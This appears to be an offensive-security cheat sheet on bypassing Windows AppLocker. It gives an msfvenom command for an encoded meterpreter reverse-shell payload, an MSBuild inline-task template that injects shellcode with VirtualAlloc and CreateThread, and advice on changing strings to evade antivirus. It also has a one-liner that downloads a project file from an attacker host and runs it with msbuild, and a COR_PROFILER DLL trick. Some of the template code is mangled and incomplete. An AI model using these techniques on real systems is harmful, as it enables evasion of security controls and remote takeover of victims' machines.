AppLocker Bypass

Bypass AppLocker

Multi-Step process to bypass App Locker via MSBuild.exe:

Generate payload for MsBuild in CSharp output format:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=<LHOST>  LPORT=<LPORT> -f csharp -e x86/shikata_ga_nai -i <num of  iterations> > <out>.cs`

Put the buffer into the template (be sure to change payload buffer, buffer size and some strings for av evasion:

<Project ToolsVersion="4.0" xmlns="">

 <!-- This inline task executes shellcode. -->

 <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->

 <!-- Save This File And Execute The Above Command -->

 <!-- Author: Casey Smith, Twitter: @subTee -->

 <!-- License: BSD 3-Clause -->

 <Target Name="Hello">

   <ClassExample />





   AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >



     <Code Type="Class" Language="cs">


       using System;

       using System.Runtime.InteropServices;

       using Microsoft.Build.Framework;

       using Microsoft.Build.Utilities;

       public class ClassExample :  Task, ITask


         private static UInt32 MEM_COMMIT = 0x1000;          

         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          


           private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,

           UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          


           private static extern IntPtr CreateThread(            

           UInt32 lpThreadAttributes,

           UInt32 dwStackSize,

           UInt32 lpStartAddress,

           IntPtr param,

           UInt32 dwCreationFlags,

           ref UInt32 lpThreadId           



           private static extern UInt32 WaitForSingleObject(           

           IntPtr hHandle,

           UInt32 dwMilliseconds


         public override bool Execute()


           byte[] shellcode = new byte[195] {};


             UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,


             Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);

             IntPtr hThread = IntPtr.Zero;

             UInt32 threadId = 0;

             IntPtr pinfo = IntPtr.Zero;

             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);

             WaitForSingleObject(hThread, 0xFFFFFFFF);

             return true;








Download & Execute:

Invoke-WebRequest "http://<ip>:<port>/<payload>.csproj" -OutFile "<outfile>.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\<outfile>.csproj

AppLocker Bypass COR Profile:

Create a dll payload like this reverse shell and run:

set COR_PROFILER_PATH=<path>/pwn.dll